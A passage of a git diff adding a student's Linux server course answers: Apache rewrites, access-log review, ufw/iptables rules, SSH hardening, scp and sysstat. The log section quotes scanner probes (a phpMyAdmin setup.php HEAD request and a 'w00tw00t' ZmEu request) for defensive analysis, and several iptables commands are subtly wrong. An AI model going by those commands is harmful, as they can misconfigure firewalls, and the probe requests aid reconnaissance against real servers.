\n \t\n \n' > ~/public_html/index.html + +``` + +3. We should redirect all index.html traffic to the folder root _/home/monkey/public_html/. This can be done by creating hidden page-related control file _.htaccess_ file to the directory root. + +``` +monkey@goauldhost:~$ cd public_html +monkey@goauldhost:~/public_html$ touch .htaccess +monkey@goauldhost:~/public_html$ echo -e '\n\tRewriteEngine On\n\tRewriteBase /\n\tRewriteRule ^index\.html$ / [NC,R,L]\n' | tee -a ./.htaccess +``` + +Reactivate Apache module 'rewrite'. We shall switch our user because user _monkey_ doesn't have _sudo_ rights at this point: + +``` +monkey@goauldhost:~/public_html$ su newuser +Password: +newuser@goauldhost:/home/monkey/public_html$ sudo a2enmod rewrite +Enabling module rewrite. +To activate the new configuration, you need to run: + service apache2 restart +newuser@goauldhost:/home/monkey/public_html$ sudo systemctl restart apache2.service +``` + +Your Apache web server should redirect all traffic of _http://174.138.2.190:80/index.html_ to address _http://174.138.2.190:80/_ + +**y)** Find clues of possible penetration attempts to your web server. You can find more information about suspicious IP address without connecting them by using commands ipcalc, geoiplookup and whois, for instance. +-------------- + +**Answer:** + +At the time of writing this answer, the Apache web server was running bit over a week period. However, there were no any webpage deployed during that time, and therefore my web server hadn't created any major log entries. However, I noticed one suspicious connection attempt to setup.php file of phpMyAdmin software, although the software was not installed. The lookup was done by checking web server log file _var/log/apache2/access.log_. The log entry itself was as follows: + +``` +66.118.142.165 - - [13/Feb/2018:14:43:58 +0000] "HEAD /phpmyadmin/scripts/setup.php HTTP/1.0" 404 159 "-" "-" +``` + +We shall analyze the logged IP address (+ download a georeferred IP database to determine more specific geolocation of the source by using _wget_ command): + +``` +newuser@goauldhost:~$ sudo apt-get -y install geoip-bin +newuser@goauldhost:~$ wget http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz +newuser@goauldhost:~$ gunzip GeoLiteCity.dat.gz +newuser@goauldhost:~$ OBSIP=66.118.142.165 +newuser@goauldhost:~$ echo -e "Server Geolocation:\n$(geoiplookup -f /home/newuser/GeoLiteCity.dat $OBSIP)\n\n$(nslookup $OBSIP)\n\nDNS Name:\n$(dig +short -x $OBSIP)" && unset OBSIP +``` + +Output is as follows: + +``` +Server Geolocation: +GeoIP City Edition, Rev 1: US, FL, Florida, Tampa, 33611, 27.886700, -82.511703, 539, 813 + +Server: 67.207.67.2 +Address: 67.207.67.2#53 + +Non-authoritative answer: +165.142.118.66.in-addr.arpa name = 66-118-142-165.static.sagonet.net. + +Authoritative answers can be found from: + +DNS Name: +66-118-142-165.static.sagonet.net. + +``` + +The log entry tells us that connection to page _http://174.138.2.190:80/phpmyadmin/scripts/setup.php_ was tried to establish. The server responded with code 404 (HTTP_NOT_FOUND), indicating that the address couldn't be found. It is seen that user agent string of _66.118.142.165_ is empty (just a line). It is known that the user agent string can be very easily customized. + +HTTP [HEAD method](http://condor.depaul.edu/dmumaugh/readings/handouts/SE435/HTTP/node14.html) were used in the connection attempt. The HTTP HEAD method is more suitable for quick file existence look-ups than HTTP GET method because only the file existence is checked, leading to decreased data transfer rates between a server and a client. The HEAD method is usually used for caching documents (data). A client program just tries to download metadata of the request document from a server. [Apache web server does not return the message response body while answering to the client program with the HTTP HEAD method.](https://hc.apache.org/httpclient-3.x/methods/head.html). + +the HEAD method can be "disabled" by adding the following lines into 1) file *~/public_html/.htaccess* (in the case of this assignment) 2) or into file */etc/apache2/sites-available/000-default.conf* 3) or any site-specific configuration file in Apache's _sites-available_ folder 4) or any _.htaccess_ file in a website directory root: + +``` +RewriteEngine on +RewriteCond %{THE_REQUEST} !^(POST|GET)\ /.*\ HTTP/1\.1$ +RewriteRule .* - [F,L] +``` + +The original answer [here](https://www.linuxquestions.org/questions/linux-security-4/disabling-head-options-http-methods-in-apache-webserver-763347/#post4511023) + +It is understandable that line _RewriteEngine on_ doesn't need to be determined twice and adding this code requires re-enabling of Apache rewrite module. + +I have had a Debian-based web server (LAMP) environment in the past years. I have included Apache access.log parts of that web server environment here (year 2014): + +[Apache - access.log, example](https://raw.githubusercontent.com/Fincer-altego/basics-of-a-linux-server-school-course-/master/apache-log-sample) + +The log file reveals many suspicious connection attempts from Thailand and Netherlands, for example. + +The most memorable log entry from the past years was, however, a penetration attempt by Romanian hacker/bot group and it looked like the following: + +``` +4.125.148.79 - - [07/Aug/2013:20:53:35 +0400] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 142 "-" "ZmEu" +``` + +**y)** Create a set of websites on your local computer and copy the sites to your web server with scp command. +-------------- + +**Answer:** + +1. Let's create the required websites locally, after which the upload is done with user _newuser_. I have used pre-created websites in this assignment. The upload is done with my Arch Linux computer using required SSH protocol: + +``` +[13/02/2018 21:04:16 - fincer: ~ ]$ scp /home/fincer/Documents/website/website_1.03_fincer.zip newuser@174.138.2.190:./ +The authenticity of host '174.138.2.190 (174.138.2.190)' can't be established. +ECDSA key fingerprint is SHA256:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX. +Are you sure you want to continue connecting (yes/no)? yes +Warning: Permanently added '174.138.2.190' (ECDSA) to the list of known hosts. +newuser@174.138.2.190's password: +website_1.03_fincer.zip 100% 656KB 655.8KB/s 00:01 +[13/02/2018 21:04:32 - fincer: ~ ]$ +``` + +2. Modify Apache default webpage address to point to _/home/newuser/public_html/_: + +``` +newuser@goauldhost:~$ sudo sed -i 's?DocumentRoot /home/monkey/public_html?DocumentRoot /home/newuser/public_html?' /etc/apache2/sites-available/000-default.conf +newuser@goauldhost:~$ sudo systemctl restart apache2.service +``` + +3. Because /home/newuser/public_html/ is empty (checked with ls command), we shall extract uploaded _website_1.03_fincer.zip_ to that directory. + +``` +newuser@goauldhost:~$ sudo apt-get update && sudo apt-get install unzip +newuser@goauldhost:~$ mv website_1.03_fincer.zip ./public_html/ && cd ./public_html +newuser@goauldhost:~$ unzip website_1.03_fincer.zip +``` + +4. It should be possible to open the website using URL _174.138.2.190_, and the website should look like the following: + +![website-sample](https://raw.githubusercontent.com/Fincer-altego/basics-of-a-linux-server-school-course-/master/pekkahh-website.png) + +5. Let's copy another website sample into folder $HOME/public_html/ of user _monkey_: + +``` +[13/02/2018 22:01:40 - fincer: ~ ]$ scp /home/fincer/Documents/server_site.tar.xz monkey@174.138.2.190:./public_html/ +``` + +6. Let's establish a new SSH connection to the virtual server computer with user _monkey_: + +``` +[13/02/2018 22:04:23 - fincer: ~ ]$ ssh monkey@174.138.2.190 +``` + +7. In the virtual web server computer terminal, go to _$HOME/public_html/ of user _monkey_, extract _server_site.tar.xz_ and put the extracted files into correct places in the directory hierarchy. Rename old _index.html_ file to _index.html.old_ + +``` +monkey@goauldhost:~/public_html$ mv index.html index.html.old +monkey@goauldhost:~/public_html$ tar xf server_site.tar.xz +monkey@goauldhost:~/public_html$ mv ./server_site/* ./ +monkey@goauldhost:~/public_html$ rm -Rf ./{server_site,server_site.tar.xz} +``` + +(you could have just used one * symbol in the previous rm command because the equal name syntax) + +The deployed website can be viewed in URL address _http://174.138.2.190:80/~monkey_, and they look as follows: + +![workprice-samplesite](https://raw.githubusercontent.com/Fincer-altego/basics-of-a-linux-server-school-course-/master/workprice-site_example.png) + +**y)** Set up a simple PHP webpage on your web server. For instance, you can print a remote address of the user ( $_SERVER['REMOTE_ADDR'] ) etc. Be careful if you use input forms of any kind. +-------------- + +**Answer:** + +In this answer, I add a PHP-based BMI calculator (Body Mass Index) to my website. For this purpose, two files were created: _bmicalc.html_ and _bmicalc.php_ which both are uploaded to the virtual web server with the following command, executed at the _local computer_: + +``` +phelenius@my-machine:~$ scp $HOME/public_html/bmi-index/{bmicalc.php,bmicalc.html} newuser@174.138.2.190:./public_html/ +newuser@174.138.2.190's password: +bmicalc.php 100% 3051 3.0KB/s 00:00 +bmicalc.html 100% 523 0.5KB/s 00:00 +``` + +The following image demonstrates a web browser view of URL address _174.138.2.190/bmicalc.html_. On the left side: the source code of the HTML page. On the right side: server-side "raw" PHP source code which is not seen by the client program, our web browser in this case (PHP code = server-side execution/only web server sees the code, JavaScript code = client-side execution/client can see the code, too): + +![bmicalc-sample](https://raw.githubusercontent.com/Fincer-altego/basics-of-a-linux-server-school-course-/master/bmicalc-sample.png) + +**Edit** The following changes has been done after answering the assignment: + +- PHP-related HTTP method GET has been changed to POST method afterwards because usage of the GET method leads to visible input values in a web browser URL field. This doesn't happen when using the POST method. + +- Implementation of server-side solutions which restrict user accessibility to other web server directories and files. + +- PHP code has been merged with the HTML document, i.e. there is no additional .php file in the web server anymore. diff --git a/exercises/h5.md b/exercises/h5.md new file mode 100644 index 0000000..d132a97 --- /dev/null +++ b/exercises/h5.md @@ -0,0 +1,1027 @@ +Linux servers - Exercice 5 +============== + +*Disclaimer:* +-------------- + +This exercise is a part of [Linux servers (ICT4TN021, spring 2018) // Linux-palvelimet (ICT4TN021, kevät 2018)](http://www.haaga-helia.fi/fi/opinto-opas/opintojaksokuvaukset/ICT4TN021) school course organized as a part of Information Technology studies in Haaga-Helia university of Applied Sciences, Helsinki, Finland. Course lecturer [Tero Karvinen](http://terokarvinen.com/) has defined the original assignment descriptions in Finnish presented in this document in English. Answers and translations have been written by Pekka Helenius (me, ~ Fincer). + +**a)** Install SSH server daemon +-------------- + +**Answer:** + +SSH daemon has already been installed on the virtual server machine (you can't establish a connection to the server with a SSH client program otherwise). However, the installation on Debian-based systems goes as follows: + +``` +phelenius@my-machine:~$ sudo apt-get update && sudo apt-get install openssh-server +``` + +Start SSH daemon and check whether it is active or not: + +``` +phelenius@my-machine:~$ sudo systemctl start sshd.service +phelenius@my-machine:~$ [[ $(systemctl is-active sshd | grep ^active | wc -w) -eq 1 ]] && echo "REPLY: SSH server daemon is active" || echo "REPLY: SSH server daemon is not active" +REPLY: SSH server daemon is active +``` + +SSH server daemon has been installed and is active on the server computer. Let's take a look-up into Systemd process tree: + +``` +phelenius@my-machine:~$ sudo systemctl status +... + CGroup: / + ├─init.scope + │ └─1 /lib/systemd/systemd --system --deserialize 20 + ├─system.slice + ... + │ ├─ssh.service + │ │ ├─1534 /usr/sbin/sshd -D + │ │ ├─2365 sshd: [accepted] + │ │ └─2366 sshd: [net] +``` + +Executable root binary file (sbin) is _/usr/sbin/sshd_ with command parameter _-D_ (Process Identifier/Process ID/PID is 1534). + +**NOTE!** The following is stated about _-D_ parameter in sshd manual: + +``` +phelenius@my-machine:~$ man sshd | grep -E "\-D" -C1 + + -D When this option is specified, sshd will not detach and does not become a daemon. This allows easy monitoring of sshd. +``` + +_-D_ parameter definition by [SSH Communications Security](https://www.ssh.com/ssh/sshd/): + +> -D Do not detach and become daemon. This is often used when sshd is run using systemd. This allows easier monitoring of the process in such environments. Without this option, the SSH server forks and detaches from terminal, making itself a background daemon process. The latter has been the traditional way to run the SSH server until recently. Many embedded systems would still use the latter. + +About relevance of the _-D_ parameter has been discussed, for example, on [superuser.com (Differences between ssh -L to -D](https://superuser.com/questions/408031/differences-between-ssh-l-to-d). + + +**b)** Establish a firewall protection to the server computer (Note: allow SSH traffic before that) +-------------- + +**Answer:** + +The firewall protection is done by using Linux kernel ip_table module(s). Firewall rules can be modified in User Space with the corresponding iptables command or with the simplified Python 3 based program/script 'Uncomplicated Firewall' (ufw). Other firewall solutions also exists on Linux, please see title 'Other firewall solutions' below. + +We can check which loadable kernel modules have been enabled in Linux kernel with the kernel-related lsmod command. + +``` +phelenius@my-machine:~$ man lsmod | sed -n '/NAME/{n;p}' | sed 's/\s*//' +lsmod - Show the status of modules in the Linux Kernel +... +phelenius@my-machine:~$ lsmod |grep filter +ip6table_filter 16384 1 +ip6_tables 28672 1 ip6table_filter +iptable_filter 16384 1 +ip_tables 24576 1 iptable_filter +x_tables 36864 14 ip6table_filter,xt_hl,xt_recent,ip_tables,xt_tcpudp,xt_limit,xt_conntrack,xt_LOG,iptable_filter,ip6t_rt,ipt_REJECT,ip6_tables,xt_addrtype,ip6t_REJECT +``` + +Source codes of these modules can be found on git.kernel.org: [ipv6 netfilter](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/net/ipv6/netfilter), [ipv6 netfilter core](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/net/ipv6/netfilter.c), [ipv4 netfilter](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/net/ipv4/netfilter), [ipv4 netfilter core](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/net/ipv4/netfilter.c) + +By default, Uncomplicated Firewall (ufw) is usually pre-installed on many Linux distributions, including Debian-based systems. Let's confirm that: + +``` +phelenius@my-machine:~$ if [[ $(dpkg --get-selections |grep ufw | awk '{print $1}' | wc -l) -eq 0 ]]; then sudo apt-get update && sudo apt-get -y install ufw && echo "REPLY: UFW is installed now"; else echo "REPLY: UFW has already been installed"; fi +REPLY: UFW has already been installed +``` + +Therefore ufw firewall is installed. Otherwise it would be installed on the system with _apt-get install_ command. + +By default, the Linux firewall blocks SSH input traffic (default port 22). This input port can be opened by applying the following ufw command: + +``` +phelenius@my-machine:~$ sudo ufw allow 22/tcp +``` + +or with the command (however, not specific port number is defined here): + +``` +phelenius@my-machine:~$ sudo ufw allow ssh +``` + +Afterwards, UFW can be re-enabled with the following command: + +``` +phelenius@my-machine:~$ sudo ufw enable +Command may disrupt existing ssh connections. Proceed with operation (y|n)? +``` + +Your answer should be 'y' (yes). The firewall does not close (possibly already established) SSH connection because we have opened port 22 TCP input traffic. We get a notification, stating: + +``` +Firewall is active and enabled on system startup +``` + +The message is bit unclear, because according to some testing, the ufw firewall may still not be enabled on system boot. Automated start of ufw during system boot can foolproofly be enabled with: + +``` +phelenius@my-machine:~$ sudo systemctl enable ufw.service +Created symlink /etc/systemd/system/multi-user.target.wants/ufw.service -> /usr/lib/systemd/system/ufw.service. +``` + +Alternatively, the following message may appear: + +``` +Synchronizing state of ufw.service with SysV init with /lib/systemd/systemd-sysv-install... +Executing /lib/systemd/systemd-sysv-install enable ufw +``` + +**iptables:** + +1. Remove ufw from the Linux system, and remove all relevant ufw entries from iptables firewall rule list. + +**NOTE!** Warning: (May) delete other important iptables rules configured by system administration! + +**NOTE!** Be sure that you have direct access (local terminal, without network) to the target machine in a case of failure. Otherwise you may lock yourself out from the server. + +``` +sudo systemctl stop ufw.service && sudo systemctl disable ufw.service +sudo apt-get purge --remove ufw +sudo iptables --flush && sudo iptables --delete-chains +``` + +2. Confirm deletion of ufw entries from iptables firewall rule list with + +``` +sudo iptables -S +``` + +Output should be: + +``` +-P INPUT ACCEPT +-P FORWARD ACCEPT +-P OUTPUT ACCEPT +``` + +3. Add new firewall rules to iptables and keep already established connections open: + +``` +sudo iptables -A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT +``` + +4. Drop all connections, excluding already established connections like SSH: + +``` +sudo iptables -A INPUT -j DROP +sudo iptables -A FORWARD -j DROP +``` + +5. Allow SSH traffic (port number: 22, protocol: tcp, etc.): + +``` +sudo iptables -I INPUT -p tcp --dport 22 -j ACCEPT +``` + +**NOTE!** This applies only to IPv4 connections. For IPv6, check [iptables6](https://www.linux.com/learn/intro-to-linux/2017/8/iptables-rules-ipv6). + +**NOTE!** The forementioned command can be written so that connections only from a single IP is allowed, by using eth0 network interface. For example: + +``` +sudo iptables -I INPUT -p tcp -i eth0 -s 231.123.24.24 --dport 22 -j ACCEPT +``` + +**NOTE:** Be sure you have enabled 'net.ifnames=0' in your udev rules to get network interface names like 'eth0', 'wlan0' etc.! + +More about setting iptables firewall rules, take a look on [DigitalOcean website](https://www.digitalocean.com/community/tutorials/iptables-essentials-common-firewall-rules-and-commands) and [iptables - Append vs. Insert - website](https://serverfault.com/questions/472258/difference-between-iptables-a-and-i-option), for example. + +6. Confirm proper iptables firewall rules with 'sudo iptables -S' command: + +``` +-P INPUT ACCEPT +-P FORWARD ACCEPT +-P OUTPUT ACCEPT +-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT +-A INPUT -j DROP +-A FORWARD -j DROP +-I INPUT -p tcp --dport 22 -j ACCEPT +``` + +7. Save the rules so that they won't be lost after rebooting: + +``` +sudo iptables-save | sudo tee /etc/iptables/iptables.save > /dev/null +cat /etc/iptables/iptables.save +``` + +8. Apply and enable the rules. You can restart iptables service (Packet Filtering Framework) if you prefer to do so: + +``` +sudo iptables-restore && sudo systemctl restart iptables.service +``` + +9. Confirm the current iptables firewall rules with the command 'sudo iptables -S'. + +More about iptables: + +- [DigitalOcean - Iptables Essentials: Common Firewall Rules and Commands, SSH service](https://www.digitalocean.com/community/tutorials/iptables-essentials-common-firewall-rules-and-commands#service-ssh) + +- [DigitalOcean - Iptables Essentials: Common Firewall Rules and Commands, Saving rules](https://www.digitalocean.com/community/tutorials/iptables-essentials-common-firewall-rules-and-commands#saving-rules). + +- [The Geek Stuff - 25 Most Frequently Used Linux IPTables Rules Examples](https://www.thegeekstuff.com/2011/06/iptables-rules-examples) + +**Other firewall solutions:** + +In addition to ufw, other iptables-based firewall solutions have been developed on Linux. Take a look on [Firestarter](http://www.fs-security.com/), [Firewalld](https://fedoraproject.org/wiki/Firewalld?rd=FirewallD), [PeerGuardian](https://sourceforge.net/projects/peerguardian/?source=navbar), [FWBuilder](http://www.fwbuilder.org/), etc. + +------------------------------------------------ + +**EXTRA - root account: more restrictions** + +In addition to previous root restrictions, the following extra restrictions were applied, too: + +- root default shell were changed to _/sbin/nologin_ in file _/etc/passwd_ + +- root account were locked by applying command _sudo usermod root --lock_ (this was done already, it sets up an exclamation mark prefix to the root account password in file _/etc/shadow_ + +- root access removal of TTY sessions by commenting out relevant lines in file _/etc/securetty_ + +- SSH: setting _PermitRootLogin no_ were applied in SSH server configuration file _/etc/ssh/sshd_config_ + +PAM configuration files (Pluggable Authentitation Modules) were not altered in _/etc/pam.d/_ although security can be improved by applying some special system-spefific authentication rules there. PAM rules can restrict root permissions as well, including executable daemon processes and commands (i.e. you can restrict even root execution rights in the target system, in contradiction what is usually told for new Linux users that "root can do anything". With PAM, you can restrict that "anything" privilege.) + +Reference: [Red Hat - 4.4.2. Disallowing Root Access](https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/4/html/Security_Guide/s2-wstation-privileges-noroot.html) + +**c)** Transfer files using SSH protocol +-------------- + +**Answer:** + +Let's use [Secure Copy (scp)](https://en.wikipedia.org/wiki/Secure_copy) command for file transfers. + +The assignment has been done in the following command sequence. The following steps are executed: + +1. Create new subdirectory _httpd_ into the current user's home directory on the local computer + +2. Download related control, description and patch files of debian package of Apache web server, version _2.4.18-2ubuntu3.5_ from archive.ubuntu.com ([packages.ubuntu.com](https://packages.ubuntu.com/xenial/apache2)). Target directory for the download is the recently created subdirectory _httpd_ + +3. Extract the downloaded archive files into $HOME/httpd. Subdirectory _debian_ will be created in _httpd_ directory. + +4. Establish a new SSH connection to the server computer with server user _newuser_, use port 1234 and create directory _$HOME/patches_ for this user. + +5. Transfer all local files (and directories) which 1) start with any character 2) end with suffix _diff_ and _patch_ 3) locate at the current user's _./httpd/debian/patches/_ subdirectory + +to the directory _$HOME/patches_ located at the server computer (where $HOME=/home/newuser/). SSH connection port is 1234. Use command scp. + +For more information about patches, check [1](https://stackoverflow.com/questions/987372/what-is-the-format-of-a-patch-file), [2](https://www.thegeekstuff.com/2014/12/patch-command-examples)) + +6. List contents of the remote subdirectory _$HOME/patches_ with SSH connection, use port 1234.. + +7. Delete current user's local subdirectory _httpd_ and its contents. _-R_ or _-r_ stands for recursive deletion, _-f_ stands for forceful removal. Remote files in the server computer's directory _/home/newuser/patches/_ will be kept intact. + +``` +[20/02/2018 13:24:40 - fincer: ~ ]$ mkdir httpd +[20/02/2018 13:24:54 - fincer: ~ ]$ wget http://archive.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.4.18-2ubuntu3.5.debian.tar.xz -P httpd +--2018-02-20 13:25:13-- http://archive.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.4.18-2ubuntu3.5.debian.tar.xz +Resolving archive.ubuntu.com... 2001:67c:1560:8001::11, 2001:67c:1360:8001::17, 2001:67c:1560:8001::14, ... +Connecting to archive.ubuntu.com|2001:67c:1560:8001::11|:80... connected. +HTTP request sent, awaiting response... 200 OK +Length: 387448 (378K) [application/x-xz] +Saving to: ‘httpd/apache2_2.4.18-2ubuntu3.5.debian.tar.xz’ + +apache2_2.4.18-2ubuntu3.5.debian.tar.xz 100%[==================================================================================>] 378.37K 450KB/s in 0.8s + +2018-02-20 13:25:15 (450 KB/s) - ‘httpd/apache2_2.4.18-2ubuntu3.5.debian.tar.xz’ saved [387448/387448] + +[20/02/2018 13:25:15 - fincer: ~ ]$ tar xf apache2_2.4.18-2ubuntu3.5.debian.tar.xz -C httpd +[20/02/2018 13:25:35 - fincer: ~ ]$ ssh newuser@174.138.2.190 -p 1234 mkdir patches +newuser@174.138.2.190's password: +[20/02/2018 13:26:12 - fincer: ~ ]$ scp -P 1234 ./httpd/debian/patches/*.{diff,patch} newuser@174.138.2.190:./patches/ +newuser@174.138.2.190's password: +hostnames_with_underscores.diff 100% 479 114.6KB/s 00:00 +reproducible_builds.diff 100% 1710 427.2KB/s 00:00 +build_suexec-custom.patch 100% 1981 473.6KB/s 00:00 +customize_apxs.patch 100% 9316 888.9KB/s 00:00 +CVE-2016-0736.patch 100% 12KB 867.4KB/s 00:00 +CVE-2016-2161.patch 100% 4787 493.1KB/s 00:00 +CVE-2016-5387.patch 100% 666 287.9KB/s 00:00 +CVE-2016-8743.patch 100% 80KB 1.0MB/s 00:00 +CVE-2017-3167.patch 100% 8922 698.9KB/s 00:00 +CVE-2017-3169.patch 100% 4663 458.1KB/s 00:00 +CVE-2017-7668.patch 100% 1746 482.5KB/s 00:00 +CVE-2017-7679.patch 100% 1925 527.4KB/s 00:00 +CVE-2017-9788.patch 100% 2252 582.1KB/s 00:00 +CVE-2017-9798.patch 100% 1172 381.3KB/s 00:00 +fhs_compliance.patch 100% 2541 635.6KB/s 00:00 +no_LD_LIBRARY_PATH.patch 100% 444 199.8KB/s 00:00 +prefork_single_process_crash.patch 100% 773 359.0KB/s 00:00 +suexec-custom.patch 100% 5785 792.4KB/s 00:00 +suexec-CVE-2007-1742.patch 100% 2356 589.3KB/s 00:00 +suexec_is_shared.patch 100% 622 194.1KB/s 00:00 +[20/02/2018 13:28:03 - fincer: ~ ]$ ssh newuser@174.138.2.190 -p 1234 ls -l ./patches +newuser@174.138.2.190's password: +total 196 +-rw-r--r-- 1 newuser newuser 12446 Feb 20 11:38 CVE-2016-0736.patch +-rw-r--r-- 1 newuser newuser 4787 Feb 20 11:38 CVE-2016-2161.patch +-rw-r--r-- 1 newuser newuser 666 Feb 20 11:38 CVE-2016-5387.patch +-rw-r--r-- 1 newuser newuser 81900 Feb 20 11:38 CVE-2016-8743.patch +-rw-r--r-- 1 newuser newuser 8922 Feb 20 11:38 CVE-2017-3167.patch +-rw-r--r-- 1 newuser newuser 4663 Feb 20 11:38 CVE-2017-3169.patch +-rw-r--r-- 1 newuser newuser 1746 Feb 20 11:38 CVE-2017-7668.patch +-rw-r--r-- 1 newuser newuser 1925 Feb 20 11:38 CVE-2017-7679.patch +-rw-r--r-- 1 newuser newuser 2252 Feb 20 11:38 CVE-2017-9788.patch +-rw-r--r-- 1 newuser newuser 1172 Feb 20 11:38 CVE-2017-9798.patch +-rw-r--r-- 1 newuser newuser 1981 Feb 20 11:38 build_suexec-custom.patch +-rw-r--r-- 1 newuser newuser 9316 Feb 20 11:38 customize_apxs.patch +-rw-r--r-- 1 newuser newuser 2541 Feb 20 11:38 fhs_compliance.patch +-rw-r--r-- 1 newuser newuser 479 Feb 20 11:38 hostnames_with_underscores.diff +-rw-r--r-- 1 newuser newuser 444 Feb 20 11:38 no_LD_LIBRARY_PATH.patch +-rw-r--r-- 1 newuser newuser 773 Feb 20 11:38 prefork_single_process_crash.patch +-rw-r--r-- 1 newuser newuser 1710 Feb 20 11:38 reproducible_builds.diff +-rw-r--r-- 1 newuser newuser 2356 Feb 20 11:38 suexec-CVE-2007-1742.patch +-rw-r--r-- 1 newuser newuser 5785 Feb 20 11:38 suexec-custom.patch +-rw-r--r-- 1 newuser newuser 622 Feb 20 11:38 suexec_is_shared.patch +[20/02/2018 13:32:01 - fincer: ~ ]$ rm -Rf httpd +``` + +**d)** Automate SSH login with public key method +-------------- + +**Answer:** + +1. Let's generate a key pair on the client computer with a user who is wanted to have the public key authentication method for SSH connections. Both private and public keys are generated with 'ssh-keygen' command. Accept the default settings unless you have any requirements to customize them. + +2. Copy the _public_ key to the server computer with your SSH client using command 'ssh-copy-id -i $HOME/.ssh/id_rsa.pub username@server-ip-or-name'. The command copies your public key to the subdirectory *.ssh/authorized_keys* located at the server computer. + +**NOTE!** Copy public key only, do **NOT** copy the private key! + +More about the topic: + +[ssh.com - Key Pair - Public and Private](https://www.ssh.com/ssh/public-key-authentication#sec-Key-Pair-Public-and-Private) + +3. Let confirm that SSH server daemon configuration file (_/etc/ssh/sshd_config_ by default) has the following settings in place (either use 'sudo nano _/etc/ssh/sshd_config_' or 'sudoedit _/etc/ssh/sshd_config_'): + +``` +AuthenticationMethods publickey +PubkeyAuthentication yes +AuthorizedKeysFile .ssh/authorized_keys +``` + +**Extra hint 1:** SSH client settings are generally defined in _/etc/ssh/ssh_config_ + +**Extra hint 2:** You can use ssh command with _-v_ parameter to gain more information about used authentication methods in unclear cases or for debugging purposes. The _-v_ parameter is defined as follows: + +> -v Verbose mode. Causes ssh to print debugging messages about its progress. This is helpful in debugging connection, authentication, and configuration problems. Multiple -v options increase the verbosity. The maximum is 3. + +4. Käynnistetään vielä palvelimen SSH-daemon uudelleen komennolla _sudo systemctl restart sshd.service_ (huom! Katkaisee muodostetut SSH-yhteydet) + +5. Testataan julkisen avaimen kirjautumismenetelmää asiakaskoneen käyttäjällä, jolla _ssh-keygen_-komento suoritettiin. Käyttäjän pitäisi päästä SSH-palvelimelle sisään ilman salasanaa. + +**EXTRA: Modifying welcome banner** + +Muokataan vielä Ubuntun oletuksena olevaa sisäänkirjautumisbanneria seuraavalla bash-skriptillä: + +``` +#!/bin/bash + +# Muokkaa ssh:n sisäänkirjautumisen yhteydessä olevaa banneria + +## 00-header-tiedosto: +# +sudo sed -i 's?printf "Welcome to %s (%s %s %s)\\n" "$DISTRIB_DESCRIPTION" "$(uname -o)" "$(uname -r)" "$(uname -m)"?printf "Welcome to %s\\nUptime: +%s\\n\\n" "Server Computer" "$(uptime)"?' /etc/update-motd.d/00-header + +## Seuraavien tiedostojen tiedostopäätettä muutetaan +## Voitaisiin myös poistaa nämä tiedostot komennolla 'sudo rm ' +# +FILES=( 10-help-text 51-cloudguest 90-updates-available 91-release-upgrade ) + +cd /etc/update-motd.d/ +for file in ${FILES[@]}; do sudo mv $file $file.old; done +cd +``` + +Banneritiedostojen sijainti vaihtelee Linux-jakeluilla. Esimerkiksi Arch Linuxilla banneri on tiedosto _etc/motd_. + +**j)** Install, configure and start sysstat. Use sar command to confirm whether the sysstat package services have been enabled (for instance, log entry "Linux reboot..." exists). Run sysstat a day or two. Afterwards, check computer workload history with sysstat commands sar, iostat, pidstat etc. Analyze the results, i.e. explain the results in detail. +-------------- + +**Answer:** + +1. We shall connect to the server computer (running Ubuntu) and then install the required package with command sequence 'sudo apt-get update && sudo apt-get install -y install sysstat' + +2. Run [shell-based sysstat script](https://github.com/Fincer-altego/basics-of-a-linux-server-school-course-/blob/master/sysstat_command.sh) which runs sar and pidstat commands two days with 20 second intervals. + +**NOTE!** The script could have been opmitized more for the real requirements for the server environment (statistics interval, collection period, etc.) + +3. The script described in step 2 has generated sar analytics file 'sar-stats_2018-02-24_2018-02-26.file' into path '/home/newuser/sar_statistics/' on the server computer. + +Time period: 24. - 26.02.2018 + +The following sums up some command samples which can be applied to the analytics file. + +| File | Description | +|------------------------------------|-------------------------------------------------| +| sar -u -f | Processor workload statistics | +| sar -v -f | Inode and file statistics | +| sar -r -f | Memory consumption statistics | +| sar -n DEV -f | Network stats: devices | +| sar -n EDEV -f | Network stats: errors in devices | +| sar -n IP -f | Network stats: IPv4 traffic | +| sar -n EIP -f | Network stats: errors in IPv4 traffic | +| sar -n IP6 -f | Network stats: IPv6 traffic | +| sar -n EIP6 -f | Network stats: errors in IPv6 traffic | +| sar -n SOCK -f | Network stats: IPv4 socket | +| sar -n SOCK6 -f | Network stats: IPv6 socket | +| sar -n TCP -f | Network stats: TCPv4 protocol traffic | +| sar -n ETCP -f | Network stats: errors in TCPv4 protocol traffic | +| sar -S -f | Swap memory consumption | +| sar -w -f | Process statistics | +| sar -F MOUNT / -f | File system which is mounted at / | + +Statistics can be combined etc, as you can find out with 'man sar' command: + +``` +sar -u 2 5 + Report CPU utilization for each 2 seconds. 5 lines are displayed. + +sar -I 14 -o int14.file 2 10 + Report statistics on IRQ 14 for each 2 seconds. 10 lines are displayed. Data are stored in a file called int14.file. + +sar -r -n DEV -f /var/log/sysstat/sa16 + Display memory and network statistics saved in daily data file 'sa16'. + +sar -A + Display all the statistics saved in current daily data file. +``` + +Or [The Geek Stuff - 10 Useful Sar (Sysstat) Examples for UNIX / Linux Performance Monitoring](https://www.thegeekstuff.com/2011/03/sar-examples/?utm_source=feedburner) + +What are inode and swap? Check +- [inode - 1](https://www.cyberciti.biz/tips/understanding-unixlinux-filesystem-inodes.html) + +- [inode - 2](https://unix.stackexchange.com/questions/117093/find-where-inodes-are-being-used) + +- [Swap](https://wiki.archlinux.org/index.php/swap). + +Additionally, the following pidstat files were generated: + +| File | Description | +|----------------------------|------------------------------------| +| pidstat_stats_cpu-tasks | Processor workload statistics | +| pidstat_stats_io | I/O statistics | +| pidstat_stats_kerneltables | Statistics of Linux kernel tables | +| 